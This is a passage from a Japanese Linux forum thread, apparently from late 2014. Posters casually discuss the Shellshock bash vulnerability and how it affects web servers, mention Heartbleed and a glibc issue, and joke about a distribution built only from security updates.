シェルに問題があっても、Webサーバ機能にどう影響してるのか イマイチ不明だな。 そもそそもwebサーバが動作しているユーザ:グループは、シェルログイン がデフォルトで不可能になってるはずだが。
修正されたようやね
環境変数で実行できるbash脆弱性を悪用できる情報が次々と見つかっているから、 bashを別のシェルに置き換えるしか対策はないのかな
646 :
login:Penguin :2014/12/28(日) 13:01:53.48 ID:UVyDWqFR
あげ
647 :
login:Penguin :2014/12/28(日) 21:20:40.40 ID:uKP7t8/4
毎度 make test で目が回る
HeartbleedもShellshockもセキュリティ板では全く話題にならなかった 今回もそうなるんだろうな、んでここのような他の板のスレで細々と語られる
今回のは glibc の問題だからこの板でいいんじゃね。
セキュリティアップデートだけ集めてディストリ作ったらどんな構成になるんだろ?
リコールの起きたパーツだけ集めて車作ってみました、みたいな?